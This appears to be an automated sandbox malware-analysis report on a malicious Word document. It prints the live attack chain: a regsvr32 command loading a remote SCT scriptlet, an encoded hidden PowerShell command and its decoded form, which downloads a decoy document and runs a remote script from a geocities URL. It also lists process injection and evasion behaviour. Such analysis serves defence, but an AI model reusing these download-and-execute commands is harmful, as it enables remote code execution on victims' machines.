Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w hidden -ep bypass -Enc JABuAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwANAAoAJABuAC4AcAByAG8AeAB5AD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARwBlAHQAUwB5AHMAdABlAG0AVwBlAGIAUAByAG8AeAB5ACgAKQA7AA0ACgAkAG4ALgBQAHIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAPQBbAE4AZQB0AC4AQwByAGUAZABlAG4AdABpAGEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQB1AGwAdABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAOwANAAoAJABuAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAiAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBnAGUAbwBjAGkAdABpAGUAcwAuAGoAcAAvAGwAZwB4AHAAbwB5ADYALwBoAHUAdQBsAGkAaQBuAC0AdAB1AHMAdQBsAC0AbwBmAGYAcwBoAC0AMgAwADEANgAwADkAMQA4AC4AZABvAGMAeAAiACwAIgAkAGUAbgB2ADoAdABlAG0AcABcAGgAdQB1AGwAaQBpAG4ALQB0AHUAcwB1AGwALQBvAGYAZgBzAGgALQAyADAAMQA2ADAAOQAxADgALgBkAG8AYwB4ACIAKQA7AA0ACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAIgAkAGUAbgB2ADoAdABlAG0AcABcAGgAdQB1AGwAaQBpAG4ALQB0AHUAcwB1AGwALQBvAGYAZgBzAGgALQAyADAAMQA2ADAAOQAxADgAL

Allocates memory in foreign processes

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory allocated: C:\Windows\System32\userinit.exe base: 60000 protect: page execute and read and write

Bypasses PowerShell execution policy

Show sources

Source: unknown

Encrypted powershell cmdline option found

Show sources

Source: unknown	Process created: Base64 decoded $n=new-object net.webclient;$n.proxy=[Net.WebRequest]::GetSystemWebProxy();$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;$n.DownloadFile("http://www.geocities.jp/lgxpoy6/huuliin-tusul-offsh-20160918.docx","$env:temp\huuliin-tusul-offsh-20160918.docx");Start-Process "$env:temp\huuliin-tusul-offsh-20160918.docx"IEX $n.downloadstring('http://www.geocities.jp/lgxpoy6/f0921.ps1');
Source: C:\Windows\System32\regsvr32.exe	Process created: Base64 decoded $n=new-object net.webclient;$n.proxy=[Net.WebRequest]::GetSystemWebProxy();$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;$n.DownloadFile("http://www.geocities.jp/lgxpoy6/huuliin-tusul-offsh-20160918.docx","$env:temp\huuliin-tusul-offsh-20160918.docx");Start-Process "$env:temp\huuliin-tusul-offsh-20160918.docx"IEX $n.downloadstring('http://www.geocities.jp/lgxpoy6/f0921.ps1');

Executes SCT (Windows Script Component) via regsvr32

Show sources

Source: unknown	Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /u /s /i:http://www.geocities.jp/lgxpoy6/f0921-6.sct scrobj.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /u /s /i:http://www.geocities.jp/lgxpoy6/f0921-6.sct scrobj.dll

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread register set: target process: 3332

Writes to foreign memory regions

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\System32\userinit.exe base: 60000

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\System32\userinit.exe	Network Connect: 116.193.154.28 53
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Network Connect: 118.151.231.180 80

Anti Debugging:

Creates guard pages, often used to prevent reverse engineering and debugging

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory allocated: page read and write and page guard

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Show sources

Source: C:\Windows\System32\regsvr32.exe

System information queried: KernelDebuggerInformation

Contains functionality for execution timing, often used to detect debuggers

Show sources

Source: C:\Windows\System32\userinit.exe

Code function: 10_2_00060DFA rdtsc

10_2_00060DFA

Enables debug privileges

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\userinit.exe	Process token adjusted: Debug

Malware Analysis System Evasion:

Queries a list of all running processes

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Contains functionality for execution timing, often used to detect debuggers

Show sources

Source: C:\Windows\System32\userinit.exe

Code function: 10_2_00060DFA rdtsc

10_2_00060DFA

Contains long sleeps (>= 3 min)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: -922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Show sources

Source: C:\Windows\System32\userinit.exe

Window / User API: threadDelayed 1523

May sleep (evasive loops) to hinder dynamic analysis

Show sources

Source: C:\Windows\System32\regsvr32.exe TID: 3040	Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3228	Thread sleep time: -100s >= -60s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3200	Thread sleep time: -922337203685477s >= -60s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3316	Thread sleep time: -922337203685477s >= -60s
Source: C:\Windows\System32\userinit.exe TID: 3340	Thread sleep time: -200000s >= -60s
Source: C:\Windows\System32\userinit.exe TID: 3336	Thread sleep time: -30000s >= -60s
Source: C:\Windows\System32\userinit.exe TID: 3404	Thread sleep count: 1523 > 30
Source: C:\Windows\System32\userinit.exe TID: 3404	Thread sleep time: -152300s >= -60s
Source: C:\Windows\System32\userinit.exe TID: 3400	Thread sleep time: -500s >= -60s
Source: C:\Windows\System32\userinit.exe TID: 3404	Thread sleep time: -100s >= -60s
Source: C:\Windows\System32\userinit.exe TID: 3340	Thread sleep time: -10000s >= -60s

Sample execution stops while process was sleeping (likely an evasion)

Show sources

Source: C:\Windows\System32\userinit.exe

Last function: Thread delayed

Hooking and other Techniques for Hiding and Protection:

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\userinit.exe	Process information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOX

Starts Microsoft Word (often done to prevent that the user detects that something wrong)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Creates and opens a fake document (probably a fake document to hide exploiting)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: cmd line: huuliin-tusul-offsh-20160918.docx

Language, Device and Operating System Detection:

Queries the cryptographic machine GUID

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Queries the installation date of Windows

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion

Queries the installation date of Windows

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Queries the volume information (name, serial number etc) of a device

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation

Behavior Graph

Legend:

Process
Signature
Created File
DNS/IP Info

Yara Overview

No Yara matches

Screenshot

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Error!

Analysis Report

Overview

General Information

Detection

Confidence

Classification

Analysis Advice

Signature Overview

Software Vulnerabilities:

Networking:

Boot Survival:

Data Obfuscation:

System Summary:

HIPS / PFW / Operating System Protection Evasion:

Anti Debugging:

Malware Analysis System Evasion:

Hooking and other Techniques for Hiding and Protection:

Language, Device and Operating System Detection:

Behavior Graph

Yara Overview

Screenshot